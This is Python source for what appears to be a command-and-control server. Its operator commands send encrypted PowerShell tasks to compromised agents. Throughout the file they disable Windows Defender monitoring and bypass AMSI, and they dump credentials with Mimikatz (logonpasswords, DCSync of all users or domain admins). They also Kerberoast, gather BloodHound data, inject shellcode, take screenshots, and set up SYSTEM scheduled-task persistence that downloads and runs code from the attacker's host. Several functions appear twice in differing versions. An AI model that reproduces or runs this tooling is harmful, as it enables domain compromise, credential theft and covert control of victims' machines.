def download(self, args=None):
if config.get_pointer() == 'main':
print "you can't use this command in main ! chose an agent"
return
global loaded
f = open("agents/download.ninja", "r")
payload = f.read()
f.close()
if SSL == True:
payload = payload.replace('{ip}', HOST).replace(
'{port}',
PORT).replace('{download}',
download_url).replace('{HTTP}', "https")
else:
payload = payload.replace('{ip}', HOST).replace(
'{port}',
PORT).replace('{download}',
download_url).replace('{HTTP}', "http")
f = open("Modules/download.ps1", "w")
f.write(payload)
f.close()
#if loaded["download"]==False:
config.COMMAND[config.get_pointer()].append(
encrypt(config.AESKey, "load download.ps1"))
config.COMMAND[config.get_pointer()].append(
encrypt(config.AESKey, "dn -filename \"" + args[1] + "\""))
def DA(self, args=None):
if config.get_pointer()=='main':
print ("you can't use this command in main ! chose an agent")
return
#config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"load ASBBypass.ps1"))
config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"load PowerView.ps1"))
config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"load DA.ps1"))
def set_beacon(self, args=None):
if config.get_pointer()=='main':
print "you can't use this command in main ! chose an agent"
return
global loaded
config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"load download.ps1"))
config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"$beacon="+args[1]))
def drm(self, args=None):
if config.get_pointer() == 'main':
print "you can't use this command in main ! chose an agent"
return
config.COMMAND[config.get_pointer()].append(
encrypt(config.AESKey,
"Set-MpPreference -DisableRealtimeMonitoring 1"))
def DA(self, args=None):
config.COMMAND[config.get_pointer()].append(
encrypt(config.AESKey, "load ASBBypass.ps1"))
config.COMMAND[config.get_pointer()].append(
encrypt(config.AESKey, "load PowerView.ps1"))
config.COMMAND[config.get_pointer()].append(
encrypt(config.AESKey, "load DA.ps1"))
def dcsync_list(self, args=None):
user = []
try:
if len(args) < 2:
print "Usage dcsunc_list <full file path>"
return
print "grab some coffe this may take too long to finish if the users are more than 10"
if len(' '.join(args[1:]).split(",")) > 1:
users = ' '.join(args[1:]).replace(", ",
",").replace(" ,", ",")
else:
list = open(args[1], 'r')
users = list.read()
list.close()
users = users.replace("\n", ",")
users = "".join(users)
config.COMMAND[config.get_pointer()].append(
encrypt(config.AESKey, "load Invoke-Mimikatz.ps1"))
config.COMMAND[config.get_pointer()].append(
encrypt(
config.AESKey,
"""$users=("{users}").split(",");For ($i=0; $i -le $users.Length; $i=$i+5) {echo $users[$i..($i+4)] | ForEach-Object { $t='"lsadump::dcsync /user:rep"';$t=$t.replace("rep",$_);Invoke-Mimikatz -Command $t}}"""
.replace("{users}", users)))
except Exception as e:
print e
def dcsync_admins(self, args=None):
if config.get_pointer()=='main':
print ("you can't use this command in main ! chose an agent")
return
print ("grab some coffe this may take too long to finish if the domain admin users are more than 10")
config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"load Invoke-Mimikatz.ps1"))
config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"""$users=(Get-ADGroupMember -Identity "Domain Admins").SamAccountName;For ($i=0; $i -le $users.Length; $i=$i+5) {echo $users[$i..($i+4)] | ForEach-Object { $t='"lsadump::dcsync /user:rep"';$t=$t.replace("rep",$_);Invoke-Mimikatz -Command $t}}"""))
def persist_schtasks(self, args=None):
if config.get_pointer()=='main':
print ("you can't use this command in main ! chose an agent")
return
CC=''
while len(CC) == 0:
CC = input('please enter schedule type ( hourly , daily , weekly , onstart) or type exit to exit the persistence module')
if len(CC)>1:
try:
if CC=='hourly':
freq="Hourly"
break;
if CC== 'daily':
freq='Daily'
break
if CC== 'onstart':
freq='onstart'
break
if CC== 'weekly':
freq='weekly'
break
if CC=='exit':
return
except:
print ("you entered wrong schedule type")
CC=''
continue
else:
CC=''
continue
if SSL==True:
http="https"
else:
http="http"
config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"""schtasks /F /create /SC {freq} /RU "NT Authority\SYSTEM" /TN "\\Microsoft\\Windows\\UpdateOrchestrators\\AC Power install" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''{HTTP}://{ip}:{port}{payload}''')'\"""".replace('{ip}', HOST).replace('{port}', PORT).replace('{payload}', raw_payload).replace('{HTTP}', http).replace('{freq}', freq)))
def kerb(self, args=None):
if config.get_pointer()=='main':
print ("you can't use this command in main ! chose an agent")
return
#config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"load ASBBypass.ps1"))
config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"load Find-PSServiceAccounts.ps1"))
config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"load Invoke-Kerberoast.ps1"))
config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"load kerb.ps1"))
def load(self, args=None):
if config.get_pointer()=='main':
print ("you can't use this command in main ! chose an agent")
return
fpm = open('Modules/' + args[1], 'r')
module = fpm.read()
config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,module))
fpm.close()
def exit(self, args=None):
if config.get_pointer() == 'main':
os._exit(0)
else:
#config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"exit"))
config.COMMAND[config.get_pointer()].append(
encrypt(config.AESKey,
"kill " + config.AGENTS[config.get_pointer()][8]))
def kerb(self, args=None):
config.COMMAND[config.get_pointer()].append(
encrypt(config.AESKey, "load ASBBypass.ps1"))
config.COMMAND[config.get_pointer()].append(
encrypt(config.AESKey, "load Find-PSServiceAccounts.ps1"))
config.COMMAND[config.get_pointer()].append(
encrypt(config.AESKey, "load Invoke-Kerberoast.ps1"))
config.COMMAND[config.get_pointer()].append(
encrypt(config.AESKey, "load kerb.ps1"))
def bloodhound(self, args=None):
config.COMMAND[config.get_pointer()].append(
encrypt(config.AESKey, "load SharpHound.ps1"))
config.COMMAND[config.get_pointer()].append(
encrypt(
config.AESKey,
"Invoke-BloodHound -CollectionMethod All -NoSaveCache -RandomFilenames -ZipFileName "
+ "".join(
[random.choice(string.ascii_uppercase)
for i in range(5)])))
def dcsync_all(self, args=None):
if config.get_pointer() == 'main':
print "you can't use this command in main ! chose an agent"
return
config.COMMAND[config.get_pointer()].append(
encrypt(config.AESKey, "load Invoke-Mimikatz.ps1"))
config.COMMAND[config.get_pointer()].append(
encrypt(
config.AESKey,
"""Invoke-Mimikatz -Command '"lsadump::dcsync /domain:{domain} /all /csv"'"""
.replace("{domain}", config.AGENTS[config.get_pointer()][6])))
def dumpcreds(self, args=None):
if config.get_pointer() == 'main':
print "you can't use this command in main ! chose an agent"
return
config.COMMAND[config.get_pointer()].append(
encrypt(config.AESKey, "load Invoke-Mimikatz.ps1"))
config.COMMAND[config.get_pointer()].append(
encrypt(
config.AESKey,
"""Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'"""
))
def bloodhound(self, args=None):
if config.get_pointer() == 'main':
print "you can't use this command in main ! chose an agent"
return
config.COMMAND[config.get_pointer()].append(
encrypt(config.AESKey, "load SharpHound.ps1"))
config.COMMAND[config.get_pointer()].append(
encrypt(
config.AESKey,
"Invoke-BloodHound -CollectionMethod All -NoSaveCache -RandomFilenames -ZipFileName "
+ "".join(
[random.choice(string.ascii_uppercase)
for i in range(5)])))
def migrate(self, args=None):
if config.get_pointer()=='main':
print ("you can't use this command in main ! chose an agent")
return
global loaded
shellcode=donut.create(file="payloads/dropper_cs.exe")
fp = open('agents/Migrator.ninja', 'r')
temp = fp.read()
temp=temp.replace('{shellcode}',base64.b64encode(shellcode).decode("utf-8")).replace('{class}',"".join([random.choice(string.ascii_uppercase) for i in range(5)]))
output=open('Modules/Migrator.ps1', 'w')
output.write(temp)
output.close()
config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"load Migrator.ps1"))
def get_groups(self, args=None):
if config.get_pointer()=='main':
print ("you can't use this command in main ! chose an agent")
return
try :
if len(args) < 2:
print ("Usage get_groups <user name>")
return
user='******'.join(args[1:])
config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"load PowerView.ps1"))
user="""(New-Object System.DirectoryServices.DirectorySearcher("(&(objectCategory=User)(samAccountName=$("{user}")))")).FindOne().GetDirectoryEntry().memberOf""".replace("{user}",user)
config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,user))
except Exception as e:
print (e)
def get_users(self, args=None):
if config.get_pointer()=='main':
print ("you can't use this command in main ! chose an agent")
return
try :
if len(args) < 2:
print ("Usage get_users <group name>")
return
group=' '.join(args[1:])
config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"load PowerView.ps1"))
group="""Get-DomainGroupMember -Identity "{group}" -Recurse""".replace("{group}",group)
config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,group))
except Exception as e:
print (e)
def get_users(self, args=None):
try:
if len(args) < 2:
print "Usage get_users <group name>"
return
group = ' '.join(args[1:])
config.COMMAND[config.get_pointer()].append(
encrypt(config.AESKey, "load PowerView.ps1"))
group = """Get-DomainGroupMember -Identity "{group}" -Recurse""".replace(
"{group}", group)
config.COMMAND[config.get_pointer()].append(
encrypt(config.AESKey, group))
except Exception as e:
print e
def screenshot(self, args=None):
if config.get_pointer()=='main':
print ("you can't use this command in main ! chose an agent")
return
f=open("agents/screenshot.ninja","r")
payload=f.read()
f.close()
if SSL==True:
payload=payload.replace('{ip}', HOST).replace('{port}', PORT).replace('{image}', image_url).replace('{cmd}', command_url).replace('{HTTP}', "https")
else:
payload=payload.replace('{ip}', HOST).replace('{port}', PORT).replace('{image}', image_url).replace('{cmd}', command_url).replace('{HTTP}', "http")
f=open("Modules/screenshot.ps1","w")
f.write(payload)
f.close()
config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"load screenshot.ps1"))
config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"scr -test 0 "))
def downloads(self, args=None):
if config.get_pointer()=='main':
print ("you can't use this command in main ! chose an agent")
return
if os.path.isdir("downloads"):
downloads = os.listdir("downloads")
for file in downloads:
print (file)
else:
print ("[-] downloads directory not Available")
def delete(self, args=None):
if config.get_pointer() != 'main':
config.set_pointer('main')
if len(args) < 2:
print "delete <id>"
return
id = args[1]
agent = ''
for i in config.AGENTS:
if id == str(config.AGENTS[i][0]):
agent = i
break
if agent != '':
del config.AGENTS[agent]
def delete_all(self, args=None):
if config.get_pointer() != 'main':
config.set_pointer('main')
config.AGENTS.clear()
def dis_amsi(self, args=None):
if config.get_pointer()=='main':
print ("you can't use this command in main ! chose an agent")
return
config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"load AMSI_Bypass.ps1"))
def unamanged_powershell(self, args=None):
if config.get_pointer()=='main':
print ("you can't use this command in main ! chose an agent")
return
global loaded
config.COMMAND[config.get_pointer()].append(encrypt(config.AESKey,"loadpsh payload-obf.ps1"))
def load(self, args=None):
fpm = open('Modules/' + args[1], 'r')
module = fpm.read()
config.COMMAND[config.get_pointer()].append(
encrypt(config.AESKey, module))
fpm.close()
def kill_all(self, args=None):
if config.get_pointer() != 'main':
config.set_pointer('main')
for i in config.AGENTS:
config.COMMAND[i].append(
encrypt(config.AESKey, "kill " + config.AGENTS[i][8]))
def load(self, args=None):
fpm = open('Modules/' + args[1], 'r')
module = fpm.read()
config.COMMAND[config.get_pointer()].append(module)